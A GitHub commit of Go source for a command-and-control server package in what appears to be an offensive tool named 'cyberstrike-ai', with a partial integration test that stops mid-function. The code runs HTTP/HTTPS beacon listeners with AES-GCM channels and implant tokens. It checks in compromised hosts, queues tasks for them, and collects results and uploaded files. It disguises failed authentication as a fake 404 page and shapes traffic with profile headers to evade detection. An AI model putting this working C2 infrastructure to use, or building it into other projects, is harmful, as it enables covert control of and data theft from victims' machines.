Add files via upload

This commit is contained in:
公明
2026-05-19 17:47:56 +08:00
committed by GitHub
parent 9f59230d74
commit a12ecdb46f
52 changed files with 12505 additions and 0 deletions
+39
View File
@@ -0,0 +1,39 @@
package c2
import (
"strings"
"cyberstrike-ai/internal/database"
"go.uber.org/zap"
)
// ResolveBeaconDialHost 决定植入端应连接的主机名(不含端口)。
// 优先级:explicitOverride > 监听器 config_json 中的 callback_host > bind_host0.0.0.0/::/空 时 detectExternalIP,失败则 127.0.0.1)。
func ResolveBeaconDialHost(listener *database.C2Listener, explicitOverride string, logger *zap.Logger, listenerID string) string {
if h := strings.TrimSpace(explicitOverride); h != "" {
return h
}
cfg := &ListenerConfig{}
if listener != nil && listener.ConfigJSON != "" {
_ = parseJSON(listener.ConfigJSON, cfg)
}
if h := strings.TrimSpace(cfg.CallbackHost); h != "" {
return h
}
if listener == nil {
return "127.0.0.1"
}
host := strings.TrimSpace(listener.BindHost)
if host == "0.0.0.0" || host == "" || host == "::" {
host = detectExternalIP()
if host == "" {
if logger != nil {
logger.Warn("listener binds 0.0.0.0 but no external IP detected, falling back to 127.0.0.1; set callback_host or pass explicit host",
zap.String("listener_id", listenerID))
}
return "127.0.0.1"
}
}
return host
}
+154
View File
@@ -0,0 +1,154 @@
package c2
import (
"crypto/aes"
"crypto/cipher"
"crypto/rand"
"encoding/base64"
"errors"
"io"
)
// AES-256-GCM 信封:每个 Listener 独立 32 字节密钥 + 每条消息独立 12 字节 nonce。
// 协议格式(base64 文本,便于 HTTP body / SSE 直接传):
// base64( nonce(12) || ciphertext+tag )
// 设计要点:
// - GCM 自带 16 字节 AEAD tag,完整性 + 机密性一次性搞定,无需额外 HMAC;
// - nonce 由 crypto/rand 生成,96bit 在密钥不变期内重复概率极低(< 2^-32 / 4B 次);
// - 密钥不出服务端:listener 创建时随机生成 32 字节,编译 beacon 时硬编码进去。
// GenerateAESKey 生成随机 32 字节 AES-256 密钥并 base64 输出
func GenerateAESKey() (string, error) {
key := make([]byte, 32)
if _, err := io.ReadFull(rand.Reader, key); err != nil {
return "", err
}
return base64.StdEncoding.EncodeToString(key), nil
}
// GenerateImplantToken 生成 32 字节 tokenbase64 编码(implant 携带在 HTTP header 鉴权用)
func GenerateImplantToken() (string, error) {
t := make([]byte, 32)
if _, err := io.ReadFull(rand.Reader, t); err != nil {
return "", err
}
return base64.RawURLEncoding.EncodeToString(t), nil
}
// EncryptAESGCM 加密任意明文,返回 base64(nonce||ct)
func EncryptAESGCM(keyB64 string, plaintext []byte) (string, error) {
key, err := decodeKey(keyB64)
if err != nil {
return "", err
}
block, err := aes.NewCipher(key)
if err != nil {
return "", err
}
gcm, err := cipher.NewGCM(block)
if err != nil {
return "", err
}
nonce := make([]byte, gcm.NonceSize())
if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
return "", err
}
ct := gcm.Seal(nil, nonce, plaintext, nil)
out := append(nonce, ct...)
return base64.StdEncoding.EncodeToString(out), nil
}
// DecryptAESGCM 解密 base64(nonce||ct),返回明文
func DecryptAESGCM(keyB64, encB64 string) ([]byte, error) {
key, err := decodeKey(keyB64)
if err != nil {
return nil, err
}
raw, err := base64.StdEncoding.DecodeString(encB64)
if err != nil {
return nil, errors.New("ciphertext base64 invalid")
}
block, err := aes.NewCipher(key)
if err != nil {
return nil, err
}
gcm, err := cipher.NewGCM(block)
if err != nil {
return nil, err
}
nonceSize := gcm.NonceSize()
if len(raw) < nonceSize+16 { // 至少 nonce + tag
return nil, errors.New("ciphertext too short")
}
nonce, ct := raw[:nonceSize], raw[nonceSize:]
pt, err := gcm.Open(nil, nonce, ct, nil)
if err != nil {
return nil, errors.New("aead open failed (key mismatch or tampered)")
}
return pt, nil
}
// EncryptAESGCMWithAAD encrypts with additional authenticated data bound to context (e.g. session_id).
// Prevents cross-session replay: ciphertext from session A cannot be fed to session B.
func EncryptAESGCMWithAAD(keyB64 string, plaintext []byte, aad []byte) (string, error) {
key, err := decodeKey(keyB64)
if err != nil {
return "", err
}
block, err := aes.NewCipher(key)
if err != nil {
return "", err
}
gcm, err := cipher.NewGCM(block)
if err != nil {
return "", err
}
nonce := make([]byte, gcm.NonceSize())
if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
return "", err
}
ct := gcm.Seal(nil, nonce, plaintext, aad)
out := append(nonce, ct...)
return base64.StdEncoding.EncodeToString(out), nil
}
// DecryptAESGCMWithAAD decrypts with AAD verification.
func DecryptAESGCMWithAAD(keyB64, encB64 string, aad []byte) ([]byte, error) {
key, err := decodeKey(keyB64)
if err != nil {
return nil, err
}
raw, err := base64.StdEncoding.DecodeString(encB64)
if err != nil {
return nil, errors.New("ciphertext base64 invalid")
}
block, err := aes.NewCipher(key)
if err != nil {
return nil, err
}
gcm, err := cipher.NewGCM(block)
if err != nil {
return nil, err
}
nonceSize := gcm.NonceSize()
if len(raw) < nonceSize+16 {
return nil, errors.New("ciphertext too short")
}
nonce, ct := raw[:nonceSize], raw[nonceSize:]
pt, err := gcm.Open(nil, nonce, ct, aad)
if err != nil {
return nil, errors.New("aead open failed (key mismatch, tampered, or AAD mismatch)")
}
return pt, nil
}
func decodeKey(keyB64 string) ([]byte, error) {
key, err := base64.StdEncoding.DecodeString(keyB64)
if err != nil {
return nil, errors.New("key base64 invalid")
}
if len(key) != 32 {
return nil, errors.New("key must be 32 bytes (AES-256)")
}
return key, nil
}
+144
View File
@@ -0,0 +1,144 @@
package c2
import (
"sync"
"sync/atomic"
"time"
)
// Event 是 EventBus 内部传输的事件单元,是 database.C2Event 的"实时投影"。
// 区别在于:
// - 数据库表保存全部历史,用于审计与列表分页;
// - EventBus 只缓存最近 N 条,用于 SSE/WS 实时推送给在线订阅者。
type Event struct {
ID string `json:"id"`
Level string `json:"level"`
Category string `json:"category"`
SessionID string `json:"sessionId,omitempty"`
TaskID string `json:"taskId,omitempty"`
Message string `json:"message"`
Data map[string]interface{} `json:"data,omitempty"`
CreatedAt time.Time `json:"createdAt"`
}
// EventBus 简单的内存广播总线。
// 设计要点:
// - 多订阅者:每个订阅者有独立 buffered channel,慢消费者不会阻塞 publisher;
// - 容量满即丢弃:发布端绝不阻塞,避免 listener accept loop / beacon handler 卡住;
// - 全局过滤:订阅时可限定 SessionID/Category,前端按需订阅,省 CPU;
// - 关闭安全:Close() 后所有订阅者 chan 关闭,防止 goroutine 泄漏。
type EventBus struct {
mu sync.RWMutex
subscribers map[string]*Subscription
closed bool
}
// Subscription 订阅句柄
type Subscription struct {
ID string
Ch chan *Event
SessionID string // 空表示不限制
Category string // 空表示不限制
Levels map[string]struct{}
dropCount atomic.Int64
}
// NewEventBus 创建总线
func NewEventBus() *EventBus {
return &EventBus{subscribers: make(map[string]*Subscription)}
}
// Subscribe 注册订阅者;返回 Subscription,调用方负责后续 Unsubscribe。
// - bufferSize:单订阅者 channel 容量,建议 64~256
// - sessionFilter / categoryFilter:空字符串=不限;
// - levelFilter[]string{"warn","critical"} 这类,nil/空表示全收。
func (b *EventBus) Subscribe(id string, bufferSize int, sessionFilter, categoryFilter string, levelFilter []string) *Subscription {
if bufferSize <= 0 {
bufferSize = 128
}
sub := &Subscription{
ID: id,
Ch: make(chan *Event, bufferSize),
SessionID: sessionFilter,
Category: categoryFilter,
}
if len(levelFilter) > 0 {
sub.Levels = make(map[string]struct{}, len(levelFilter))
for _, l := range levelFilter {
sub.Levels[l] = struct{}{}
}
}
b.mu.Lock()
defer b.mu.Unlock()
if b.closed {
close(sub.Ch)
return sub
}
b.subscribers[id] = sub
return sub
}
// Unsubscribe 注销订阅者并关闭 channel
func (b *EventBus) Unsubscribe(id string) {
b.mu.Lock()
defer b.mu.Unlock()
if sub, ok := b.subscribers[id]; ok {
delete(b.subscribers, id)
close(sub.Ch)
}
}
// Publish 广播事件给所有订阅者;非阻塞,channel 满时静默丢弃
func (b *EventBus) Publish(e *Event) {
if e == nil {
return
}
b.mu.RLock()
subs := make([]*Subscription, 0, len(b.subscribers))
for _, s := range b.subscribers {
if s.matches(e) {
subs = append(subs, s)
}
}
closed := b.closed
b.mu.RUnlock()
if closed {
return
}
for _, s := range subs {
select {
case s.Ch <- e:
default:
s.dropCount.Add(1)
}
}
}
// Close 关闭总线,停止所有订阅
func (b *EventBus) Close() {
b.mu.Lock()
defer b.mu.Unlock()
if b.closed {
return
}
b.closed = true
for id, s := range b.subscribers {
close(s.Ch)
delete(b.subscribers, id)
}
}
func (s *Subscription) matches(e *Event) bool {
if s.SessionID != "" && e.SessionID != s.SessionID {
return false
}
if s.Category != "" && e.Category != s.Category {
return false
}
if len(s.Levels) > 0 {
if _, ok := s.Levels[e.Level]; !ok {
return false
}
}
return true
}
+29
View File
@@ -0,0 +1,29 @@
package c2
import "context"
type hitlRunCtxKey struct{}
// WithHITLRunContext 将 runCtx(通常为整条 Agent / SSE 请求生命周期)挂到传入的 ctx 上。
// MCP 工具 handler 收到的 ctx 可能是带单次工具超时的子 context,在工具 return 时会被 cancel
// 危险任务 HITL 应通过 HITLUserContext 使用 runCtx 等待人工审批。
func WithHITLRunContext(ctx, runCtx context.Context) context.Context {
if ctx == nil || runCtx == nil {
return ctx
}
return context.WithValue(ctx, hitlRunCtxKey{}, runCtx)
}
// HITLUserContext 返回用于 C2 危险任务 HITL 等待的 context
// 若曾用 WithHITLRunContext 注入更长寿命的 runCtx 则返回之,否则返回 ctx。
func HITLUserContext(ctx context.Context) context.Context {
if ctx == nil {
return context.Background()
}
if v := ctx.Value(hitlRunCtxKey{}); v != nil {
if run, ok := v.(context.Context); ok && run != nil {
return run
}
}
return ctx
}
+22
View File
@@ -0,0 +1,22 @@
package c2
import (
"encoding/base64"
"os"
)
// 这些薄封装存在的目的:
// - 让 manager.go / handler 中的逻辑更直观,避免反复 import os;
// - 便于将来用接口抽象(譬如改成 internal/storage 的实现)做单元测试。
func osMkdirAll(path string, perm os.FileMode) error {
return os.MkdirAll(path, perm)
}
func osWriteFile(path string, data []byte, perm os.FileMode) error {
return os.WriteFile(path, data, perm)
}
func base64Decode(s string) ([]byte, error) {
return base64.StdEncoding.DecodeString(s)
}
+69
View File
@@ -0,0 +1,69 @@
package c2
import (
"strings"
"sync"
"cyberstrike-ai/internal/database"
"go.uber.org/zap"
)
// Listener 监听器抽象:每种传输方式(TCP/HTTP/HTTPS/WS/DNS)都实现此接口;
// Manager 不感知具体实现细节,通过 ListenerRegistry 工厂创建。
type Listener interface {
// Type 返回当前 listener 的类型字符串(如 "tcp_reverse"
Type() string
// Start 启动监听;如果端口被占用应返回 ErrPortInUse
Start() error
// Stop 停止监听并释放所有相关 goroutine(不应抛 panic
Stop() error
}
// ListenerCreationCtx 工厂初始化 listener 时收到的上下文
type ListenerCreationCtx struct {
Listener *database.C2Listener
Config *ListenerConfig
Manager *Manager
Logger *zap.Logger
}
// ListenerFactory 创建 listener 实例的工厂;返回的实例尚未 Start
type ListenerFactory func(ctx ListenerCreationCtx) (Listener, error)
// ListenerRegistry 类型 → 工厂 的注册表,由 internal/app 启动时注册具体实现,
// 测试中也可注入 mock 工厂来覆盖。
type ListenerRegistry struct {
mu sync.RWMutex
factories map[string]ListenerFactory
}
// NewListenerRegistry 创建空注册表
func NewListenerRegistry() *ListenerRegistry {
return &ListenerRegistry{factories: make(map[string]ListenerFactory)}
}
// Register 注册一种 listener 工厂
func (r *ListenerRegistry) Register(typeName string, f ListenerFactory) {
r.mu.Lock()
defer r.mu.Unlock()
r.factories[strings.ToLower(strings.TrimSpace(typeName))] = f
}
// Get 取工厂;nil 表示未注册
func (r *ListenerRegistry) Get(typeName string) ListenerFactory {
r.mu.RLock()
defer r.mu.RUnlock()
return r.factories[strings.ToLower(strings.TrimSpace(typeName))]
}
// RegisteredTypes 列出已注册的类型,给前端枚举用
func (r *ListenerRegistry) RegisteredTypes() []string {
r.mu.RLock()
defer r.mu.RUnlock()
out := make([]string, 0, len(r.factories))
for k := range r.factories {
out = append(out, k)
}
return out
}
+549
View File
@@ -0,0 +1,549 @@
package c2
import (
"crypto/ecdsa"
"crypto/elliptic"
"crypto/rand"
"crypto/sha256"
"crypto/subtle"
"crypto/tls"
"crypto/x509"
"crypto/x509/pkix"
"encoding/base64"
"encoding/hex"
"encoding/json"
"encoding/pem"
"errors"
"fmt"
"io"
"math/big"
mrand "math/rand"
"net"
"net/http"
"os"
"path/filepath"
"strings"
"sync"
"time"
"cyberstrike-ai/internal/database"
"go.uber.org/zap"
)
// HTTPBeaconListener 实现 HTTP/HTTPS Beacon
// - beacon 端定期 POST {checkin_path}(携带 implant_token + AES 加密 body);
// - 服务端解密、登记会话、回执 sleep + 是否有任务;
// - beacon 收到 has_tasks=true 时 GET {tasks_path} 拉取加密任务列表;
// - 任务完成后 POST {result_path} 回传结果。
//
// 优势:所有任务异步、可批量、支持文件上传/截图/任意大 blob,是 C2 的"主战场"。
type HTTPBeaconListener struct {
rec *database.C2Listener
cfg *ListenerConfig
manager *Manager
logger *zap.Logger
useTLS bool
profile *database.C2Profile
srv *http.Server
mu sync.Mutex
stopCh chan struct{}
stopped bool
}
// NewHTTPBeaconListener 工厂(注册到 ListenerRegistry["http_beacon"]
func NewHTTPBeaconListener(ctx ListenerCreationCtx) (Listener, error) {
return &HTTPBeaconListener{
rec: ctx.Listener,
cfg: ctx.Config,
manager: ctx.Manager,
logger: ctx.Logger,
useTLS: false,
stopCh: make(chan struct{}),
}, nil
}
// NewHTTPSBeaconListener 工厂(注册到 ListenerRegistry["https_beacon"]
func NewHTTPSBeaconListener(ctx ListenerCreationCtx) (Listener, error) {
return &HTTPBeaconListener{
rec: ctx.Listener,
cfg: ctx.Config,
manager: ctx.Manager,
logger: ctx.Logger,
useTLS: true,
stopCh: make(chan struct{}),
}, nil
}
// Type 类型字符串
func (l *HTTPBeaconListener) Type() string {
if l.useTLS {
return string(ListenerTypeHTTPSBeacon)
}
return string(ListenerTypeHTTPBeacon)
}
// Start 起 HTTP server
func (l *HTTPBeaconListener) Start() error {
// Load Malleable Profile if configured
l.loadProfile()
mux := http.NewServeMux()
mux.HandleFunc(l.cfg.BeaconCheckInPath, l.withProfileHeaders(l.handleCheckIn))
mux.HandleFunc(l.cfg.BeaconTasksPath, l.withProfileHeaders(l.handleTasks))
mux.HandleFunc(l.cfg.BeaconResultPath, l.withProfileHeaders(l.handleResult))
mux.HandleFunc(l.cfg.BeaconUploadPath, l.withProfileHeaders(l.handleUpload))
mux.HandleFunc(l.cfg.BeaconFilePath, l.withProfileHeaders(l.handleFileServe))
addr := fmt.Sprintf("%s:%d", l.rec.BindHost, l.rec.BindPort)
l.srv = &http.Server{
Addr: addr,
Handler: mux,
ReadHeaderTimeout: 15 * time.Second,
ReadTimeout: 60 * time.Second,
WriteTimeout: 120 * time.Second,
IdleTimeout: 300 * time.Second,
}
ln, err := net.Listen("tcp", addr)
if err != nil {
if isAddrInUse(err) {
return ErrPortInUse
}
return err
}
if l.useTLS {
tlsConfig, err := l.buildTLSConfig()
if err != nil {
_ = ln.Close()
return fmt.Errorf("build TLS config: %w", err)
}
l.srv.TLSConfig = tlsConfig
go func() {
if err := l.srv.ServeTLS(ln, "", ""); err != nil && !errors.Is(err, http.ErrServerClosed) {
l.logger.Warn("https_beacon ServeTLS exited", zap.Error(err))
}
}()
} else {
go func() {
if err := l.srv.Serve(ln); err != nil && !errors.Is(err, http.ErrServerClosed) {
l.logger.Warn("http_beacon Serve exited", zap.Error(err))
}
}()
}
return nil
}
// Stop 关闭
func (l *HTTPBeaconListener) Stop() error {
l.mu.Lock()
if l.stopped {
l.mu.Unlock()
return nil
}
l.stopped = true
close(l.stopCh)
l.mu.Unlock()
if l.srv != nil {
ctx, cancel := contextWithTimeout(5 * time.Second)
defer cancel()
_ = l.srv.Shutdown(ctx)
}
return nil
}
// ----------------------------------------------------------------------------
// HTTP handlers
// ----------------------------------------------------------------------------
func (l *HTTPBeaconListener) handleCheckIn(w http.ResponseWriter, r *http.Request) {
if r.Method != http.MethodPost {
http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
return
}
if !l.checkImplantToken(r) {
l.disguisedReject(w)
return
}
body, err := io.ReadAll(http.MaxBytesReader(w, r.Body, 1<<20))
if err != nil {
http.Error(w, "read failed", http.StatusBadRequest)
return
}
// 尝试 AES-GCM 解密(完整 beacon 二进制走加密通道)
var req ImplantCheckInRequest
plaintext, decErr := DecryptAESGCM(l.rec.EncryptionKey, string(body))
if decErr == nil {
if err := json.Unmarshal(plaintext, &req); err != nil {
l.disguisedReject(w)
return
}
} else {
// 解密失败:尝试当作明文 JSON(兼容 curl oneliner 等轻量级客户端)
if err := json.Unmarshal(body, &req); err != nil {
l.disguisedReject(w)
return
}
}
isPlaintext := decErr != nil
if req.UserAgent == "" {
req.UserAgent = r.UserAgent()
}
if req.SleepSeconds <= 0 {
req.SleepSeconds = l.cfg.DefaultSleep
}
// curl oneliner 可能不携带完整字段,用 remote IP + listener ID 生成稳定标识
host, _, _ := net.SplitHostPort(r.RemoteAddr)
if strings.TrimSpace(req.ImplantUUID) == "" {
// 基于 IP + listener ID 生成稳定 UUID,同一 IP 多次 check_in 复用同一会话
req.ImplantUUID = fmt.Sprintf("curl_%s_%s", host, shortHash(host+l.rec.ID))
}
if strings.TrimSpace(req.Hostname) == "" {
req.Hostname = "curl_" + host
}
if strings.TrimSpace(req.InternalIP) == "" {
req.InternalIP = host
}
if strings.TrimSpace(req.OS) == "" {
req.OS = "unknown"
}
if strings.TrimSpace(req.Arch) == "" {
req.Arch = "unknown"
}
session, err := l.manager.IngestCheckIn(l.rec.ID, req)
if err != nil {
http.Error(w, "ingest failed", http.StatusInternalServerError)
return
}
queued, _ := l.manager.DB().ListC2Tasks(database.ListC2TasksFilter{
SessionID: session.ID,
Status: string(TaskQueued),
Limit: 1,
})
resp := ImplantCheckInResponse{
SessionID: session.ID,
NextSleep: session.SleepSeconds,
NextJitter: session.JitterPercent,
HasTasks: len(queued) > 0,
ServerTime: time.Now().UnixMilli(),
}
if isPlaintext {
w.Header().Set("Content-Type", "application/json")
json.NewEncoder(w).Encode(resp)
} else {
l.writeEncrypted(w, resp)
}
}
func (l *HTTPBeaconListener) handleTasks(w http.ResponseWriter, r *http.Request) {
if r.Method != http.MethodGet {
http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
return
}
if !l.checkImplantToken(r) {
l.disguisedReject(w)
return
}
sessionID := r.URL.Query().Get("session_id")
if sessionID == "" {
l.disguisedReject(w)
return
}
session, err := l.manager.DB().GetC2Session(sessionID)
if err != nil || session == nil {
l.disguisedReject(w)
return
}
envelopes, err := l.manager.PopTasksForBeacon(sessionID, 50)
if err != nil {
http.Error(w, "pop tasks failed", http.StatusInternalServerError)
return
}
if envelopes == nil {
envelopes = []TaskEnvelope{}
}
resp := map[string]interface{}{"tasks": envelopes}
if l.isPlaintextClient(r) {
w.Header().Set("Content-Type", "application/json")
json.NewEncoder(w).Encode(resp)
} else {
l.writeEncrypted(w, resp)
}
}
func (l *HTTPBeaconListener) handleResult(w http.ResponseWriter, r *http.Request) {
if r.Method != http.MethodPost {
http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
return
}
if !l.checkImplantToken(r) {
l.disguisedReject(w)
return
}
body, err := io.ReadAll(http.MaxBytesReader(w, r.Body, 64<<20))
if err != nil {
http.Error(w, "read failed", http.StatusBadRequest)
return
}
var report TaskResultReport
plaintext, decErr := DecryptAESGCM(l.rec.EncryptionKey, string(body))
if decErr == nil {
if err := json.Unmarshal(plaintext, &report); err != nil {
l.disguisedReject(w)
return
}
} else {
if err := json.Unmarshal(body, &report); err != nil {
l.disguisedReject(w)
return
}
}
if err := l.manager.IngestTaskResult(report); err != nil {
http.Error(w, "ingest result failed", http.StatusInternalServerError)
return
}
resp := map[string]string{"ok": "1"}
if l.isPlaintextClient(r) {
w.Header().Set("Content-Type", "application/json")
json.NewEncoder(w).Encode(resp)
} else {
l.writeEncrypted(w, resp)
}
}
// handleUpload 实现 implant 主动上传文件给服务端(如 download 任务的二进制结果)。
// Body 为 AES-GCM 加密后的 base64,与 check-in/result 保持一致的安全策略。
func (l *HTTPBeaconListener) handleUpload(w http.ResponseWriter, r *http.Request) {
if r.Method != http.MethodPost {
http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
return
}
if !l.checkImplantToken(r) {
l.disguisedReject(w)
return
}
taskID := r.URL.Query().Get("task_id")
if taskID == "" {
l.disguisedReject(w)
return
}
body, err := io.ReadAll(http.MaxBytesReader(w, r.Body, 256<<20))
if err != nil {
http.Error(w, "read failed", http.StatusBadRequest)
return
}
plaintext, err := DecryptAESGCM(l.rec.EncryptionKey, string(body))
if err != nil {
l.disguisedReject(w)
return
}
dir := filepath.Join(l.manager.StorageDir(), "uploads")
if err := os.MkdirAll(dir, 0o755); err != nil {
http.Error(w, "mkdir failed", http.StatusInternalServerError)
return
}
dst := filepath.Join(dir, taskID+".bin")
if err := os.WriteFile(dst, plaintext, 0o644); err != nil {
http.Error(w, "save failed", http.StatusInternalServerError)
return
}
l.writeEncrypted(w, map[string]interface{}{"ok": 1, "size": len(plaintext)})
}
// handleFileServe 实现服务端 → implant 的文件下发(upload 任务用)。
// 路径形如 /file/<task_id>,文件内容经 AES-GCM 加密后返回。
func (l *HTTPBeaconListener) handleFileServe(w http.ResponseWriter, r *http.Request) {
if r.Method != http.MethodGet {
http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
return
}
if !l.checkImplantToken(r) {
l.disguisedReject(w)
return
}
prefix := l.cfg.BeaconFilePath
taskID := strings.TrimPrefix(r.URL.Path, prefix)
if taskID == "" || strings.Contains(taskID, "/") || strings.Contains(taskID, "\\") || strings.Contains(taskID, "..") {
l.disguisedReject(w)
return
}
fpath := filepath.Join(l.manager.StorageDir(), "downstream", taskID+".bin")
absPath, err := filepath.Abs(fpath)
if err != nil {
l.disguisedReject(w)
return
}
absDir, err := filepath.Abs(filepath.Join(l.manager.StorageDir(), "downstream"))
if err != nil || !strings.HasPrefix(absPath, absDir+string(filepath.Separator)) {
l.disguisedReject(w)
return
}
data, err := os.ReadFile(absPath)
if err != nil {
l.disguisedReject(w)
return
}
l.writeEncrypted(w, map[string]interface{}{
"file_data": base64Encode(data),
})
}
// ----------------------------------------------------------------------------
// 鉴权 / 输出辅助
// ----------------------------------------------------------------------------
// checkImplantToken 校验 X-Implant-Token header(恒定时间比较防止时序攻击)
func (l *HTTPBeaconListener) checkImplantToken(r *http.Request) bool {
got := r.Header.Get("X-Implant-Token")
if got == "" {
got = r.Header.Get("Cookie") // 兼容 Malleable Profile 用 Cookie 携带
}
expected := l.rec.ImplantToken
if got == "" || expected == "" {
return false
}
return subtle.ConstantTimeCompare([]byte(got), []byte(expected)) == 1
}
// disguisedReject 鉴权失败时返回 404,避免暴露 listener 是 C2
func (l *HTTPBeaconListener) disguisedReject(w http.ResponseWriter) {
w.Header().Set("Content-Type", "text/html; charset=utf-8")
w.WriteHeader(http.StatusNotFound)
_, _ = fmt.Fprint(w, "<html><body><h1>404 Not Found</h1></body></html>")
}
// writeEncrypted JSON 序列化 + AES-GCM 加密 + 写回
func (l *HTTPBeaconListener) writeEncrypted(w http.ResponseWriter, payload interface{}) {
body, err := json.Marshal(payload)
if err != nil {
http.Error(w, "encode failed", http.StatusInternalServerError)
return
}
enc, err := EncryptAESGCM(l.rec.EncryptionKey, body)
if err != nil {
http.Error(w, "encrypt failed", http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/octet-stream")
_, _ = w.Write([]byte(enc))
}
// loadProfile loads Malleable Profile from DB if the listener has a profile_id configured
func (l *HTTPBeaconListener) loadProfile() {
if l.rec.ProfileID == "" {
return
}
profile, err := l.manager.GetProfile(l.rec.ProfileID)
if err != nil || profile == nil {
l.logger.Warn("加载 Malleable Profile 失败,使用默认配置",
zap.String("profile_id", l.rec.ProfileID), zap.Error(err))
return
}
l.profile = profile
l.logger.Info("Malleable Profile 已加载",
zap.String("profile_id", profile.ID),
zap.String("profile_name", profile.Name),
zap.String("user_agent", profile.UserAgent))
}
// withProfileHeaders wraps a handler to inject Malleable Profile response headers
func (l *HTTPBeaconListener) withProfileHeaders(next http.HandlerFunc) http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
if l.profile != nil && len(l.profile.ResponseHeaders) > 0 {
for k, v := range l.profile.ResponseHeaders {
w.Header().Set(k, v)
}
}
next(w, r)
}
}
// ----------------------------------------------------------------------------
// TLS 自签证书(仅供测试 / Phase 2 默认行为)
// ----------------------------------------------------------------------------
func (l *HTTPBeaconListener) buildTLSConfig() (*tls.Config, error) {
// 操作员显式提供证书 → 优先使用
if l.cfg.TLSCertPath != "" && l.cfg.TLSKeyPath != "" {
cert, err := tls.LoadX509KeyPair(l.cfg.TLSCertPath, l.cfg.TLSKeyPath)
if err == nil {
return &tls.Config{Certificates: []tls.Certificate{cert}, MinVersion: tls.VersionTLS12}, nil
}
l.logger.Warn("加载 TLS 证书失败,回退自签", zap.Error(err))
}
// 自签证书:CN 用 listener 名,避免重复
cert, err := generateSelfSignedCert(l.rec.Name)
if err != nil {
return nil, err
}
return &tls.Config{Certificates: []tls.Certificate{cert}, MinVersion: tls.VersionTLS12}, nil
}
func generateSelfSignedCert(cn string) (tls.Certificate, error) {
priv, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
if err != nil {
return tls.Certificate{}, err
}
serial, _ := rand.Int(rand.Reader, big.NewInt(1<<62))
tmpl := &x509.Certificate{
SerialNumber: serial,
Subject: pkix.Name{CommonName: cn},
NotBefore: time.Now().Add(-1 * time.Hour),
NotAfter: time.Now().Add(365 * 24 * time.Hour),
KeyUsage: x509.KeyUsageDigitalSignature,
ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
IPAddresses: []net.IP{net.ParseIP("127.0.0.1")},
DNSNames: []string{"localhost"},
}
der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &priv.PublicKey, priv)
if err != nil {
return tls.Certificate{}, err
}
keyDER, err := x509.MarshalECPrivateKey(priv)
if err != nil {
return tls.Certificate{}, err
}
certPEM := pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE", Bytes: der})
keyPEM := pem.EncodeToMemory(&pem.Block{Type: "EC PRIVATE KEY", Bytes: keyDER})
return tls.X509KeyPair(certPEM, keyPEM)
}
func base64Encode(data []byte) string {
return base64.StdEncoding.EncodeToString(data)
}
func shortHash(s string) string {
h := sha256.Sum256([]byte(s))
return hex.EncodeToString(h[:6])
}
// isPlaintextClient 判断请求是否来自明文客户端(curl oneliner 等)
// 完整 beacon 二进制会设置 Content-Type: application/octet-stream
func (l *HTTPBeaconListener) isPlaintextClient(r *http.Request) bool {
ct := r.Header.Get("Content-Type")
accept := r.Header.Get("Accept")
return strings.Contains(ct, "application/json") ||
strings.Contains(accept, "application/json") ||
strings.Contains(r.UserAgent(), "curl/")
}
// ApplyJitter 给定基础 sleep + jitter 百分比,返回随机抖动后的 duration
// 公开给 listener_websocket / payload 模板共用,避免重复实现
func ApplyJitter(baseSec, jitterPercent int) time.Duration {
if baseSec <= 0 {
return 0
}
if jitterPercent <= 0 {
return time.Duration(baseSec) * time.Second
}
if jitterPercent > 100 {
jitterPercent = 100
}
delta := mrand.Intn(2*jitterPercent+1) - jitterPercent // [-j, +j]
factor := 1.0 + float64(delta)/100.0
return time.Duration(float64(baseSec)*factor) * time.Second
}
+129
View File
@@ -0,0 +1,129 @@
package c2
import (
"bytes"
"encoding/json"
"io"
"net"
"net/http"
"path/filepath"
"strconv"
"strings"
"testing"
"time"
"cyberstrike-ai/internal/database"
"go.uber.org/zap"
)
// 集成验证:路由、鉴权伪装 404、明文 check-in JSON 回包。
func TestHTTPBeaconListener_CheckInMatrix(t *testing.T) {
tmp := t.TempDir()
dbPath := filepath.Join(tmp, "c2.sqlite")
db, err := database.NewDB(dbPath, zap.NewNop())
if err != nil {
t.Fatal(err)
}
t.Cleanup(func() { _ = db.Close() })
lnPick, err := net.Listen("tcp", "127.0.0.1:0")
if err != nil {
t.Fatal(err)
}
port := lnPick.Addr().(*net.TCPAddr).Port
_ = lnPick.Close()
keyB64, err := GenerateAESKey()
if err != nil {
t.Fatal(err)
}
token := "test-implant-token-fixed"
lid := "l_testhttpbeacon01"
rec := &database.C2Listener{
ID: lid,
Name: "t",
Type: string(ListenerTypeHTTPBeacon),
BindHost: "127.0.0.1",
BindPort: port,
EncryptionKey: keyB64,
ImplantToken: token,
Status: "stopped",
ConfigJSON: `{"beacon_check_in_path":"/check_in"}`,
CreatedAt: time.Now(),
}
if err := db.CreateC2Listener(rec); err != nil {
t.Fatal(err)
}
m := NewManager(db, zap.NewNop(), filepath.Join(tmp, "c2store"))
m.Registry().Register(string(ListenerTypeHTTPBeacon), NewHTTPBeaconListener)
if _, err := m.StartListener(lid); err != nil {
t.Fatal(err)
}
t.Cleanup(func() { _ = m.StopListener(lid) })
base := "http://127.0.0.1:" + strconv.Itoa(port)
client := &http.Client{Timeout: 5 * time.Second}
t.Run("wrong_path_go_default_404", func(t *testing.T) {
resp, err := client.Post(base+"/nope", "application/json", strings.NewReader(`{}`))
if err != nil {
t.Fatal(err)
}
defer resp.Body.Close()
b, _ := io.ReadAll(resp.Body)
if resp.StatusCode != http.StatusNotFound {
t.Fatalf("status=%d body=%q", resp.StatusCode, b)
}
if !strings.Contains(string(b), "404") || !strings.Contains(strings.ToLower(string(b)), "not found") {
t.Fatalf("unexpected body: %q", b)
}
})
t.Run("check_in_wrong_token_disguised_html_404", func(t *testing.T) {
req, _ := http.NewRequest(http.MethodPost, base+"/check_in", bytes.NewBufferString(`{"hostname":"h"}`))
req.Header.Set("X-Implant-Token", "wrong-token")
req.Header.Set("Content-Type", "application/json")
